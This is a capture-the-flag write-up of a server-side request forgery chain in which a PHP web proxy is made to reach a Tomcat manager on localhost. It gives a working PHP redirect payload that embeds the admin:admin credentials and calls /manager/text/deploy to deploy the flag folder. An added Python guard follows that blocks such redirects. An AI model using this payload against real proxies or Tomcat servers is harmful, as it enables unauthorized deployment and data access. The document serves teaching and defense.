CTF Challenge Description:

The challenge contains a PHP web proxy and a Tomcat server which has the Tomcat manager app deployed and was only accessible via the PHP web proxy.

https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxy container, and it has a few open issues, including some that look like they could be security-relevant.

Solution

To reach the Tomcat container from the proxy, simply enter 127.0.0.1:8888 to view the Tomcat start page. Tomcat mentions that an admin interface should be at /manager/html, but when we visit 127.0.0.1:8888/manager/html through the proxy we get a "401 Unauthorized" error.

We also find the username and password (in manager-web.xml), and that /manager/text exists as a script-friendly interface to the manager.

We can use /manager/text/deploy to deploy the folder that contains the flag and then visit it like any other web page.

Then we host the following PHP file on our attacker machine, reachable for example at:

http://127.0.0.1:8000/test

<?php
// Redirect the proxy to the Tomcat deploy endpoint, with the manager credentials embedded in the URL
header('Location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. Redirect the proxy to http://127.0.0.1:8000/test
  2. Then redirect it to http://127.0.0.1:8888/foofour/flag.txt
  3. Flag: INS{SSRF-As-A-Service}
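The chain above works because the proxy fetches whatever URL it is given and follows redirects without re-checking where they lead. The following is an added example, not code from the write-up or from php-proxy-app, of the guard such a proxy needs: it rejects non-HTTP schemes, URLs with embedded credentials and targets that resolve to loopback or private addresses, and re-runs that check on every redirect hop. The host attacker.example, its resolved address 1.2.3.4 and the fake fetch/DNS functions are constructed for the demonstration.

```python
# Added example, not code from the write-up or from php-proxy-app: an SSRF guard that
# validates the requested URL and re-validates every redirect hop before a proxy fetches it.
import ipaddress
from typing import Callable, Optional
from urllib.parse import urljoin, urlsplit

def _blocked_ip(ip: str) -> bool:
    a = ipaddress.ip_address(ip)
    return (a.is_loopback or a.is_private or a.is_link_local or a.is_multicast
            or a.is_reserved or a.is_unspecified)

def check_target(url: str, resolve: Optional[Callable] = None) -> Optional[str]:
    """Return None if url is an acceptable proxy target, else the reason it was rejected.
    resolve(host) -> list of IP strings is injected so the check can run offline."""
    p = urlsplit(url)
    if p.scheme not in ("http", "https"):
        return "scheme not allowed"            # blocks file:, gopher:, etc.
    if p.username is not None or p.password is not None:
        return "credentials embedded in URL"   # the admin:admin@ trick in the write-up
    if not p.hostname:
        return "missing host"
    try:
        ips = [str(ipaddress.ip_address(p.hostname))]  # literal IP, no lookup needed
    except ValueError:
        ips = resolve(p.hostname) if resolve else None
        if not ips:
            return "host did not resolve"
    for ip in ips:
        if _blocked_ip(ip):
            return f"target resolves to non-public address {ip}"
    return None

def follow_safely(url: str, fetch: Callable, resolve: Optional[Callable] = None, max_hops: int = 5):
    """fetch(url) -> (status, location_or_body). Every hop is checked, not only the first URL,
    so a 302 from a public host towards 127.0.0.1 is refused instead of followed."""
    for _ in range(max_hops):
        reason = check_target(url, resolve)
        if reason:
            return ("blocked", url, reason)
        status, payload = fetch(url)
        if status in (301, 302, 303, 307, 308):
            url = urljoin(url, payload)
            continue
        return ("ok", url, payload)
    return ("blocked", url, "too many redirects")

# Constructed sample: a public host whose /test page replays the write-up's redirect.
FAKE_DNS = {"attacker.example": ["1.2.3.4"]}.get
def FAKE_FETCH(url):
    return (302, "http://admin:admin@127.0.0.1:8888/manager/html") if url == "http://attacker.example/test" else (200, "page body")
```

Running follow_safely("http://attacker.example/test", FAKE_FETCH, FAKE_DNS) returns a "blocked" result at the second hop; a real deployment would also pin the resolved address for the actual connection so that DNS rebinding cannot change it between check and fetch.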
